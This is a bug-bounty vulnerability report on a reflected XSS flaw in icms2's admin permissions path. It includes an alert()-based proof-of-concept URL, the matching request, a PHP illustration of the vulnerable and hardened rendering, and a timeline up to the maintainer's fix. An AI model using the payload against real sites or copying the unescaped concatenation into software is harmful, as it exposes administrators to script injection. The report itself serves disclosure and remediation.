Reflected XSS in URL path of '/admin/controllers/edit/activity/perms/' in instantsoft/icms2

Valid

Reported on Aug 4th 2023


Description

/admin/controllers/edit/activity/perms/ takes input from the URL path directly, without sufficient sanitization, and reflects it into the page, leading to a reflected XSS.

A valid admin session is required; without it, the user is redirected to the login page instead of the affected page.

Proof of Concept

  1. Login as an administrator
  2. Visit the following URL to trigger JavaScript code: http://icms.local/admin/controllers/edit/activity/perms/%22%3E%3Cimg%20src%3da%20onerror%3dalert(location.origin)%3E

Payload

"><img src=a onerror=alert(location.origin)>

Request:

GET /admin/controllers/edit/activity/perms/%22%3E%3Cimg%20src%3da%20onerror%3dalert(location.origin)%3E HTTP/1.1
Host: icms.local
[...]

The inserted input would then be reflected on the page like this:

<form action="/admin/controllers/edit/activity/perms_save/"><img src=a onerror=alert(location.origin)>" method="post">

Remedial Action

It is recommended to sanitize the input (HTML-encode it for the attribute context it is written into) before it is reflected on the affected page.
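The following PHP snippet is an added illustration, not icms2's code and not the fix in the linked commit: it models the reflection the report shows (a trailing path segment copied into the form's action attribute) and a hardened version that validates the segment and encodes it for the attribute context. The function names, the assumed slug format and the routing detail are assumptions for illustration.

```php
<?php
declare(strict_types=1);

// Vulnerable pattern (assumed shape of the defect): the extra URL path segment
// is concatenated straight into an HTML attribute, so a double quote in the
// segment closes the attribute and the rest is parsed as markup.
function renderPermsFormVulnerable(string $extraSegment): string
{
    $action = '/admin/controllers/edit/activity/perms_save/' . $extraSegment;
    return '<form action="' . $action . '" method="post">';
}

// Hardened pattern, two layers:
//  1. Accept only the characters a real segment can contain (assumed here to
//     be a short slug of letters, digits and underscores) and reject the rest
//     before it reaches the template.
//  2. Encode whatever is reflected for the HTML attribute context anyway, so a
//     later relaxation of the allowlist cannot reintroduce the injection.
function renderPermsFormHardened(string $extraSegment): string
{
    if ($extraSegment !== '' && !preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $extraSegment)) {
        throw new InvalidArgumentException('unexpected characters in path segment');
    }
    $action = '/admin/controllers/edit/activity/perms_save/' . $extraSegment;
    $safe   = htmlspecialchars($action, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<form action="' . $safe . '" method="post">';
}

// The report's payload after URL-decoding, as a router would hand it to the controller.
$segment = rawurldecode('%22%3E%3Cimg%20src%3da%20onerror%3dalert(location.origin)%3E');

// Reproduces the broken markup the report shows: the attribute is closed early
// and the <img> element becomes part of the page.
echo renderPermsFormVulnerable($segment), PHP_EOL;

// The hardened variant refuses the segment outright.
try {
    echo renderPermsFormHardened($segment), PHP_EOL;
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}

// Encoding alone, the minimal fix where validation is not feasible: the quote
// and angle brackets become entities and stay inside the attribute value.
echo htmlspecialchars($segment, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'), PHP_EOL;
```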

Impact

An attacker could perform unauthorized actions in the context of the victim's browser.

We are processing your report and will contact the instantsoft/icms2 team within 24 hours. 2 months ago
We have contacted a member of the instantsoft/icms2 team and are waiting to hear back 2 months ago
instantsoft/icms2 maintainer (Maintainer), 2 months ago:

Fixed https://github.com/instantsoft/icms2/commit/1dbc3e6c8fbf5d2dc551cb27fad0de3584dee40f

instantsoft/icms2 maintainer validated this vulnerability 2 months ago
legpains has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
instantsoft/icms2 maintainer marked this as fixed in 2.16.1-git with commit 1dbc3e 2 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
instantsoft/icms2 maintainer published this vulnerability 2 months ago
instantsoft/icms2 maintainer gave praise 2 months ago
Thank you!
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1